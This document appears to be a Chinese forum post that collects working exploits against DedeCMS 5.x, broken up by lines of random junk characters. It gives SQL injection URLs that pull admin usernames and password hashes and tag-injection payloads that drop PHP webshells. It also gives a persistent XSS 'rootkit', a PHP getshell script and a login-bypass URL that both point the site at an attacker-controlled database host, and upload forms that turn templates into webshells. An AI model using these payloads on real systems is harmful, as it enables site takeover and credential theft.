|
|
% a' |6 s& E$ g' V( H
Dedecms 5.6 rss注入漏洞
" @# _! B1 a; ^# R; i4 t1 E4 ~http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=11 S" \" ~- I1 k1 X3 u
- z w0 |2 q" Q$ E% v& g% j0 c Q& l& j9 V
9 ?, e1 s4 _; \. Z
* ~$ S2 A2 F. p/ J
' d+ I0 @1 w& v$ d
s7 {/ c& U1 q4 `, p. w7 {, Q) [1 q. p, _( f2 w3 H! D
6 o: ]8 h' n! _DedeCms v5.6 嵌入恶意代码执行漏洞" W% T6 U) C* z4 \, M- P, h
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}, Z% N+ i, S* I" V+ W! S+ \
发表后查看或修改即可执行- }! N0 q y+ T! s2 h& A
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
0 K1 {: z6 f: F6 l6 T6 S/ O& J生成x.php 密码xiao,直接生成一句话。
X% ]- B" R! [0 s$ Q- O
6 ~8 w& P$ H' o2 ]( U( r3 r! w5 f- v& Y; n& R
/ l) D, M" X# Q* S8 H
' U2 J6 w. \0 ~ G; r* h/ X ~: z2 m$ ^5 F* o6 p. u
5 L0 h! }' v& {* N5 I, m7 \7 m7 N
3 g$ D3 X a9 ]. L/ z" U% [* wDede 5.6 GBK SQL注入漏洞4 F( K& L6 G- }* N+ r
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
i; }5 @9 ?. ]. L# ]! Mhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe; q& F$ [) ~: E z
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
! g- C" B) M/ }2 `* a* D2 V% W2 d
8 |0 e3 x" g& v7 n
, |' U: K/ _9 k9 V0 m- C9 V5 O& _" j- I, u1 ~, Z8 G& M* ^) g
8 ~$ ~2 s/ t5 u) ~% _
1 t; q" Q0 m7 x3 Q1 q" c& @$ I+ Q$ w% Y& Z W0 z3 P9 D, H% b, Z
7 k# R. n( i0 F7 f
. g+ f8 @1 [! q2 t. ?) yDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
2 Q4 @& S8 f# |! C/ Ehttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 D. u2 I! |" i, D. G* x& }' a- ~$ ]5 \6 r5 A5 h9 O: p' m
: q- P0 h1 y" t5 A& ^( \! `/ h4 ]$ R) q/ a3 n d
+ s( z# K" V; I# q4 S5 n* p
) ?; x( e7 i/ l: i# \
1 q# d) G: D* R Q" U
DEDECMS 全版本 gotopage变量XSS漏洞/ m6 T2 x$ A% ?7 I7 T( u: c& U
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
5 U( s- v+ `: W K: @; d6 _http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=", b" X: N) r" a3 c( i
3 b& W! J+ M! d) G
/ D, C P0 o# d
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 $ F7 {+ A& ?4 x
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda4 Q% B0 [) q6 y; i3 g; [
# ?) R, o( \: f" G: m) n1 }: I# X- [7 a' r& _2 T. i7 s$ R
http://v57.demo.dedecms.com/dede/login.php
/ F9 b- e6 y" j+ }. ]7 B: H; p! v" _7 Z1 ?
" a6 @0 {7 `; |1 D, ?; n. h: x9 M5 ]
color=Red]DeDeCMS(织梦)变量覆盖getshell% [1 m3 G2 w/ [7 u, Y
#!usr/bin/php -w
?, J$ A5 E! b<?php
) i) C* }1 H @! merror_reporting(E_ERROR);
9 D/ m% L+ _4 r0 Zset_time_limit(0);- X/ G1 t0 ~' T/ ^& U) @3 }( T
print_r('
! @1 H: ?# z H+ mDEDEcms Variable Coverage
* m% U& _6 u: ]Exploit Author: www.heixiaozi.comwww.webvul.com' Y" t! E# [6 }' O
);4 z: {$ P, [+ |6 L+ p6 X# S* @
echo "\r\n";( P+ M% T+ R* o- g. o. d8 G
if($argv[2]==null){
* X, z+ e/ _* X4 V- h, xprint_r('
5 u' E& p2 S0 S9 f3 a& [9 k+---------------------------------------------------------------------------+
+ X2 G: }, e! c$ \- q4 IUsage: php '.$argv[0].' url aid path
0 X1 | T# ]# A+ caid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
$ A& G; _) O6 t) nExample:. R" i" d7 o% K
php '.$argv[0].' www.site.com 1 old8 J# b9 @ d L' k* I6 y$ e& C
+---------------------------------------------------------------------------+
" U0 D# m, S u& S');
A! I: ~3 ]7 _; Z! ^8 b" @exit;1 ]! M; Y$ m( e
}' Z# B- M/ L& n+ E
$url=$argv[1];
- L; X% j3 J% j i2 O+ j* i$aid=$argv[2];
8 {" R+ t. B, ^ w0 O$path=$argv[3];
& @6 o4 y" \$ c+ }( q v; _$exp=Getshell($url,$aid,$path);
9 m2 s6 ]5 E3 E) Uif (strpos($exp,"OK")>12){
( o/ W4 V/ A6 ^3 {$ b, b6 ?8 Gecho "6 Z2 e1 T T# b
Exploit Success \n";/ {. f2 X7 `' G- h( f1 M
if($aid==1)echo ": f. ^& l. Y* U1 X4 ?$ D# K
Shell:".$url."/$path/data/cache/fuck.php\n" ;
1 L/ Q9 |, P. H( L, o1 l
( Z3 Y& b+ T4 R" C& `" z# a
* p$ s& C0 l0 Pif($aid==2)echo "+ o/ {4 E. y1 H# l
Shell:".$url."/$path/fuck.php\n" ;
) ~, W" t: }/ s3 W1 [! a" f/ c% u; S5 [6 O" u% ~
8 f' Z9 V5 H \) d8 l, |
if($aid==3)echo "
' f# m K" b0 M7 T4 n- ZShell:".$url."/$path/plus/fuck.php\n";0 s9 ?8 W' g' t: N2 C& c
) M0 w( K* q# _! |4 r" M2 Z$ y
0 }: u" c! O! k8 j* Z5 r1 j: K5 a8 U/ l
}else{ m( a! J( C% `& N% G- A1 ]8 B
echo "' P0 H) Z$ _% D8 }
Exploit Failed \n";
: Q* I$ P0 {4 H' F4 `8 S9 ^0 y}4 X! K& U* X( P- \- V
function Getshell($url,$aid,$path){
8 d0 G2 U; h# z7 x& D" m: c8 H- D$id=$aid;
/ C; D0 F9 n6 c: ]# l/ Q9 I0 M: b$host=$url;
3 ?1 G+ p& B. f$port="80";/ M k6 p/ w' L6 M& T1 V
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
2 I" G" O8 n7 \& v' K ~! x$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";7 _( l( Y- J/ O" \ J7 `
$data .= "Host: ".$host."\r\n";2 F' x j! B: J) j, @+ W
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
8 K* X: }1 e5 E2 n! i# f# F6 R; [6 }$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
& l9 j B& b+ P5 Q$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
2 y* B* N7 O. `% V# I* J//$data .= "Accept-Encoding: gzip,deflate\r\n";/ p7 q7 [6 L4 ]! C- W* Q
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
# u; p0 Q5 A- {8 b% [$data .= "Connection: keep-alive\r\n";; q/ i. i! V( U
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- n2 x/ C) v) E+ M5 ]7 F$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
9 t2 R- s$ @8 n/ i$data .= $content."\r\n";
* j5 r& Q' x* d% p) _$ock=fsockopen($host,$port);. I1 q1 X! B6 O# Z9 s) L0 j
if (!$ock) {
" S0 s# b2 w# {9 p6 Yecho "# \: c/ z+ f! c& D
No response from ".$host."\n";
& K4 t1 [7 P$ R5 Z: c o* \' K}1 S- Q6 |) z/ a. ~
fwrite($ock,$data);
) |: X5 i5 f, O! ?: q& v( ]while (!feof($ock)) {
; I: {/ [; w6 b. `* a& W! M$exp=fgets($ock, 1024);
/ ~) J$ ~8 c) f& V1 D) d) rreturn $exp;# A- i( {: f- e i
}% D* }9 Q+ a2 ?% x7 Q0 F0 c) W: w
}$ r- d3 u ^/ c& s: M8 Z
1 H, s2 Q4 i+ W, N* ^6 y
! u( j" K% Z: C4 l" h: U
?> u1 d, `$ }/ k8 A
' E, t& k4 H1 L5 Y; U+ S
% [! @- I& m. L& y
9 d6 [4 ~: H- J5 g$ h- x- Y7 c) }: a( b- C
4 `* J3 T; v: V* k' R9 d
3 V4 u6 A1 m% X8 E' E
$ N- Y, T' I% t6 m3 b
: W; T3 Q$ s, j& [& s" h. I' v2 N
, ~' o1 u1 l: x
1 k" I4 p. e! T+ ?% m/ lDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
4 e5 g) \' i9 B4 k) Qhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: `; C0 G5 t0 y& i1 B D; P0 M7 Z6 A) n2 s0 h m
$ g2 n5 o0 j7 H2 H% n- c; J' x: v
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
6 [ X' b g! ^6 C
( `. k2 P; m- x5 X9 M% f- j# N- k' ?$ ^, |
此漏洞的前提是必须得到后台路径才能实现
! b+ R' s2 Y* q( R% K3 p4 _3 R8 S7 n( o! L
@( D. m3 a: ]/ R4 n, k4 c
0 c' s" c* K+ t# ^: `7 E' ]" `
5 S3 h; F' c Q& ~( N5 ?5 v& M& A# p6 r9 u* g- `1 }5 b
3 U5 f" @9 t5 O: B& W( w1 @) Y: L
; V! y3 c& v/ ~
) c$ }1 z) s- f9 ~' ^$ |- T) @, }& M0 k
Dedecms织梦 标签远程文件写入漏洞
& k9 N3 c+ ?1 M, e& z1 r# d+ V前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
* M- ^: S ^& p+ d; ~+ \: n. G: O* r Q! T1 g
. Y( p* x$ y! T; ]# A
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
; t4 l) h4 l9 T& [# |<form action="" method="post" name="QuickSearch" id="QuickSearch">' ^# e4 E; _* V
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
; W5 i( Y- q+ k. d. w8 E) y<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
# d I3 m4 @1 i( t<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />3 i4 @1 M9 ?( I8 z9 U/ f4 \
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />; ~, Y3 G" ~: C6 T4 G" J9 }8 u" }
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />7 t$ N7 D7 d, }) @' U/ z6 n% K
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; `" w- p' V$ H R* w* u0 ?; S' S<input type="text" value="true" name="nocache" style="width:400">; d8 [& A8 \- p( N$ o' O
<input type="submit" value="提交" name="QuickSearchBtn"><br />% S8 n |, ~! e$ u, x
</form>& o* D& P1 A# b" U+ M$ y
<script>* t& h. O Q4 ^
function addaction()
6 _& b( ?4 I2 Z{
' L+ y, }4 ^8 z( A. P0 r( Q8 ?$ h6 Ddocument.QuickSearch.action=document.QuickSearch.doaction.value;! ~- I' G# A- @' B3 X$ P3 a9 O
}
- D3 {; N; Q2 q5 V3 T M% W4 c</script># R0 |+ a2 G) C3 g/ O: ?, C
- p2 t$ U0 e. ]2 }3 E, \. V a. Z2 u
7 b; ~: q4 J3 x- a/ W6 P8 J* s" Y: x6 [ r: Z6 T/ C2 b& V
6 C0 `1 B( T& A& T6 i+ [
: L8 v" w2 d9 U. |8 [' P* a
1 o& m0 N' M, F, X: ?- y
5 S! @! k# c8 b& _0 [6 f; N0 ?/ d- _' z
0 R8 R+ C1 U& | b$ j8 T6 S( v% z0 `. Z: S* E- \& ~" y# h* v
DedeCms v5.6 嵌入恶意代码执行漏洞/ v" `5 M# {* a5 G/ J0 N
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
6 F9 i5 ~; d5 Y5 T) Ia{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
; n6 W/ g# U L8 S生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
. W7 A; G) i- @1 XDedecms <= V5.6 Final模板执行漏洞0 c5 x8 Y e( O- I4 y
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:6 T+ z* p. ~. D& w1 @
uploads/userup/2/12OMX04-15A.jpg
- i; ?2 }1 R ]& }1 p8 M5 a! B% v) m: o- x4 y" E% d. c! r: R
. G+ o- J0 Z8 y) ~模板内容是(如果限制图片格式,加gif89a):
* S% g! C- [* o& J{dede:name runphp='yes'}7 o9 r8 ~. r1 M) q8 H$ U
$fp = @fopen("1.php", 'a');; u8 J% v i; J3 `, g' l
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");9 A# I" N O5 W
@fclose($fp);& A; `0 w7 m8 U* `# f
{/dede:name}7 i9 z# U) C# ~% D8 `5 P0 f
2 修改刚刚发表的文章,查看源文件,构造一个表单:0 i5 L7 I' u$ m$ W& h3 ~- \
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">8 r& R0 Y0 V M6 W
<input type="hidden" name="dopost" value="save" />7 D% @1 j& z: h
<input type="hidden" name="aid" value="2" />
3 y+ ^ k; G2 o0 Y3 w<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />& \* J* x" E) C! `
<input type="hidden" name="channelid" value="1" />
1 r' ~9 a7 a1 H<input type="hidden" name="oldlitpic" value="" />
, m/ C+ q, W. }$ o, @<input type="hidden" name="sortrank" value="1275972263" />
# Q$ _2 a8 d# x" e# q- n# r5 t
/ y. v* r& B9 S1 `* [; o9 d$ F3 F" A1 j7 Y2 k
<div id="mainCp">
( [9 A6 Y/ @# n. u* d<h3 class="meTitle"><strong>修改文章</strong></h3>
' L' u# T1 W6 e- N- n- a A" m) f2 A' z* _ f
0 X5 B$ r6 @' F
<div class="postForm">, p* a" T3 K3 _) i, Q) s
<label>标题:</label>
- l6 n- @6 }- b- H; e% ]<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>( m/ d7 K5 G& W& }3 B
. p4 r9 H: ]0 h! k! ]3 U
3 W2 Z9 }" b; Q<label>标签TAG:</label>2 _6 U' Q2 Y7 l' s; |
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
* r" [0 {6 ]' B4 Z% |8 {- e! j2 R9 q% n' N4 u4 J
9 T& m% K9 i/ \4 U" @5 g' b$ g<label>作者:</label>( a7 k u ?, H
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
- C4 [2 j. D5 g' L" s* _ ~
9 t3 V8 ^) P6 V2 P! H7 H) y
. n" m) ]- {! y. F, K<label>隶属栏目:</label>
+ x) [. J: s I, R<select name='typeid' size='1'>0 B( y, P/ t& H* k# I
<option value='1' class='option3' selected=''>测试栏目</option>
; u9 `4 J7 `+ v</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
# u) h \+ E* m, G( H+ q( [$ d
. ?5 J5 i, o+ R) H; \8 ^6 n) [' w* r7 D
<label>我的分类:</label>
( \2 B& h% P, U4 G<select name='mtypesid' size='1'>% @: F# z! z7 t
<option value='0' selected>请选择分类...</option>
! ^5 o& Y& g4 f0 V' g5 H+ x. a B<option value='1' class='option3' selected>hahahha</option>. p' E, t( Z' t4 \) h
</select>$ C9 Z2 }- l# \; J9 x8 n! o4 o
: j- |; @/ x& P( m) ~3 K1 W
$ S/ Y$ W9 x) b3 K* u( e+ @<label>信息摘要:</label>/ {! W+ Z, Q R% s# f6 U5 A* M
<textarea name="description" id="description">1111111</textarea>
, d" }4 b% F4 |5 d$ X(内容的简要说明)
* G9 g C/ T2 q) b- z1 l6 _7 {0 |5 C* G/ O0 f$ g. P
2 w5 ~- Z; j9 e0 ^* }$ T
<label>缩略图:</label>, Z2 q7 \; L6 B! f' y! ^2 [
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
1 C8 J, i0 K4 c: W( |2 C! R
# r% d3 |( ~+ p! s" z/ L+ V
) q# ~6 Z- N9 W- S<input type='text' name='templet'$ k j( C$ H+ B# y; w3 G
value="../ uploads/userup/2/12OMX04-15A.jpg">
. M! ~1 W) K7 c# w+ O5 J: G<input type='text' name='dede_addonfields'
# T1 U# D) |* X( u) a+ k, }value="templet,htmltext;">(这里构造)
$ h# z& {' Z/ D/ e8 x</div>0 ]+ b" f$ ^; t8 o% u* z
9 T9 l A+ f" _4 V, F/ w8 C# \% ^- g1 M
<!-- 表单操作区域 -->4 s8 R1 q% r2 P, h8 l8 Y' ~
<h3 class="meTitle">详细内容</h3>- W! v/ z' ?3 V& T
7 r: H0 u+ i& H$ O4 x; a' ~9 A
+ q$ k/ O2 z$ `$ j% y5 y
<div class="contentShow postForm">* Y# |, w+ R/ m
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>" n- m; K. E5 ~) _
- \9 V3 z& o9 g P t
1 s) G @5 d; B6 ~8 O& H# u<label>验证码:</label>. B9 @/ ]5 V& P$ X& ?
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' /> d8 n3 o$ i$ y8 \& D5 Y1 p% `
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
% q# g2 ?8 b! j% `- f8 e, ~
$ I$ B3 E/ Q6 X3 ?: W: J! A! g( ^5 V/ B, H* K$ f
<button class="button2" type="submit">提交</button>
, \1 a9 a$ T2 N6 W8 q/ ?<button class="button2 ml10" type="reset">重置</button>
1 ]5 g, o2 A& V* [</div>
6 n; U9 y: F8 ~6 P2 D1 K- O M3 W3 K; Z+ T) M7 |. @
6 l/ y. x' A( D, V1 G2 D7 _# A! `3 j</div>
9 ?4 Q2 m9 d. L5 h/ ^: J
. |. {% K1 z" a, z7 h
4 Q" t& l8 A L</form>
. ]- B' Q7 C7 U1 Q. o
2 G! J/ N3 a2 w
2 q& p$ E0 M, Z/ N: j+ ^提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章: W+ q( i4 z: w- N! W! O
假设刚刚修改的文章的aid为2,则我们只需要访问:7 H+ T' N, B9 r; C" Y2 H, g9 i
http://127.0.0.1/dede/plus/view.php?aid=2
0 k- r1 Q& b) f" o: \即可以在plus目录下生成webshell:1.php7 `( D" i s! A2 _* O: J
( ~% V' G4 r: X2 X/ J V! {0 _' p
+ D, d/ Y' U0 P* y" `% y" J
& Q) V' [5 a. i" P
/ r9 D9 X" c. S( ?+ }$ |. S
2 `: F9 P$ c2 s+ }& H
# S, M- t ~' i7 e& o, |& m# ?: {5 u( H2 `: K& Z: V% G
, u8 \2 Y- P/ Q7 @5 U
1 Z9 B5 n% ~, o% ]: D' i/ v
: K1 J# ]& J1 Z
* A9 o! {% z. x0 @' F5 M
0 G/ D# ~' p* E+ _DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)( C/ O7 I% ^2 i0 q
Gif89a{dede:field name='toby57' runphp='yes'}; Z+ R$ U* ]2 B3 U' {* y
phpinfo();* o4 D4 ^ \; v) c0 J2 x* K
{/dede:field}4 x; K/ k6 z, a' o) o
保存为1.gif
5 N. ? @4 x! k' Y$ v* l+ }<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 4 r$ d% J8 b2 O+ {& Z2 e; m; v
<input type="hidden" name="aid" value="7" />
. X5 S, }$ L; e# T+ n P<input type="hidden" name="mediatype" value="1" /> ' r0 v( o' W4 v
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 5 D/ Z1 l7 e$ ^' i0 a2 w& \% O
<input type="hidden" name="dopost" value="save" />
+ G, n& p# o4 a' D: l<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
+ b& Z: |# O% Q' U<input name="addonfile" type="file" id="addonfile"/> `3 H( I5 V" Z
<button class="button2" type="submit" >更改</button>
6 f, u7 G9 I0 N# h</form>
) j' ?: ^2 x4 {3 ^) V
0 Q( z$ u R0 p/ E/ P
0 z' h' s9 S' T5 c/ Q) I2 s7 C, A构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
! {9 B4 {+ H% T! U' l* [$ @发表文章,然后构造修改表单如下:& W: x; \9 ^ L3 t& W
9 g5 M9 w7 y5 D5 H4 k6 R. i( B+ g5 B$ K& K
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> * J! L0 r! [1 k6 A& |7 T
<input type="hidden" name="dopost" value="save" />
6 ^$ E a5 L( i7 c" R<input type="hidden" name="aid" value="2" /> , Y% z# ?! a9 V4 t2 ~
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
6 A7 ?' s @% }! t<input type="hidden" name="channelid" value="1" /> 6 ?0 L9 U% V7 J" _6 B- e3 I
<input type="hidden" name="oldlitpic" value="" /> " L6 q) y2 R* B% F# V* w
<input type="hidden" name="sortrank" value="1282049150" /> , i+ z) s' J1 u8 L1 U% }
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
1 n* R* F! c Y" ~3 c( \<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> + L3 L8 `) O: u0 j1 l
<select name='typeid' size='1'>
* G. j/ |0 F3 V$ X& s) N) x<option value='1' class='option3' selected=''>Test</option> , E( {1 u9 l* I1 x( b9 t: ]& q
<select name='mtypesid' size='1'> + `/ j) n, c3 c- [9 {6 B+ F
<option value='0' selected>请选择分类...</option>
! ~* u' B0 _6 A/ ~4 o<option value='1' class='option3' selected>aa</option></select> # U- Q2 E1 g( b2 r8 y
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 8 A. O4 }1 [! j- z" j; P/ l
<input type='hidden' name='dede_addonfields' value="templet"> 1 ^4 q8 p4 D5 {% O
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> + x4 _, i% \; q+ J- T4 O
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ) \: n4 a4 T* i4 c3 V3 p
<button class="button2" type="submit">提交</button> ; K/ I* ~2 A/ s& B% k7 [# T
</form>! x7 v6 h) j( H# K6 F
% U9 x* z& v/ n' ^9 r/ E; R6 I6 _7 X+ Q# J5 ]# |
- e5 |# [ ~" t# M
. E' v+ t. f9 |+ o1 Q4 X+ z/ h9 m+ a
. N7 r! K( l7 l0 ~+ U+ J
$ h7 }; \1 i' Y9 i
4 n) F& D, G* F/ r. v& B. c3 S$ U2 r$ @4 E1 L; Z+ F% e. Z3 r3 T' y
7 G9 t, d1 w7 E# S$ H+ t. r% `" N, y/ i
4 y" J' G r. X4 G6 Q$ x M3 f+ r5 F& E$ I
织梦(Dedecms)V5.6 远程文件删除漏洞2 k5 n: x: j: S) y, b
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
# b3 E2 m5 s7 \) i3 [1 N& @
4 v. I O3 b( U" j# ^, j
" r, C# ?. s" q/ D% R6 S* q- B" g& S* ~( F
. z/ z( F; `% H! e/ z
( \( L# p: U. H
5 Z8 U' o7 o1 b, T! ]/ f. P* K0 S
/ F% B5 i8 f0 w, k
: s3 O4 ?+ e% f# R* N7 p8 ~& T+ L6 M( T9 y
G8 F6 @# t4 }织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
. J: d e% t% ~- a+ }! I, thttp://www.test.com/plus/carbuya ... urn&code=../../5 ?, h* s% n& q* J
! \9 Q$ u8 l$ t$ f1 c3 _- y
( r; ?- Y# m7 X. ?1 w# p- r
, S0 Z# C7 t4 \, m1 q7 M" s3 S7 g. ]; E; X* q4 G
! N' O4 w/ ?/ |% i/ {* P @9 v0 W% ]' S$ f/ h
3 j# c0 O% P/ n) y. @& n* W# \0 n& M; m
2 [0 @" s# V# k$ ~+ Y/ T" F
2 O- O) K$ r4 TDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
1 r! ^6 @* m" D9 `plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`$ P: f8 Y9 q! @9 d
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5# Z' J* j& a! S3 h$ v% I2 x
) n5 y9 p& B* E4 L; j9 @
$ i% h1 I. g( ~$ f
9 ~$ O, X3 w/ t7 W
; X! p ^% v* h3 M( T2 ^
6 ^0 ?) @( [. J( H% B$ M, q
/ \" S, ~% T% {" L/ N5 r/ n, L' J) `7 \& {( H8 \' ~1 A! d
# K1 l' `8 j: c
# W+ r; ^4 R& m
/ @( d# t& w& H; o# \织梦(Dedecms) 5.1 feedback_js.php 注入漏洞; h$ h0 [4 c5 S7 V
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='( K& Z8 O' N. F6 I( k& r/ D1 n A7 b
6 U7 `# p1 b/ \2 u
* U! `4 W+ _! e2 W/ E
0 m8 ?; j$ ^$ F
+ A0 w& }/ W0 C' f9 H4 a1 }" |5 D
5 a- c- T* }* U
/ l2 F; _/ B7 a& |- d$ i7 t4 V4 u/ K3 ]5 G& [3 s
" E/ r1 \2 I( _7 u
5 I: a1 h V9 P: V7 E. v% k& \
2 x$ c* u! b3 t. ~织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
8 w9 p: c6 y) b7 s" }1 j+ `) ^<html>& x+ h, G- b! d6 \
<head>1 x( f- k) ~5 Z3 s
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>: W( _! C2 f, _$ R" b. @
</head>) W# \8 r" y7 J# t4 v
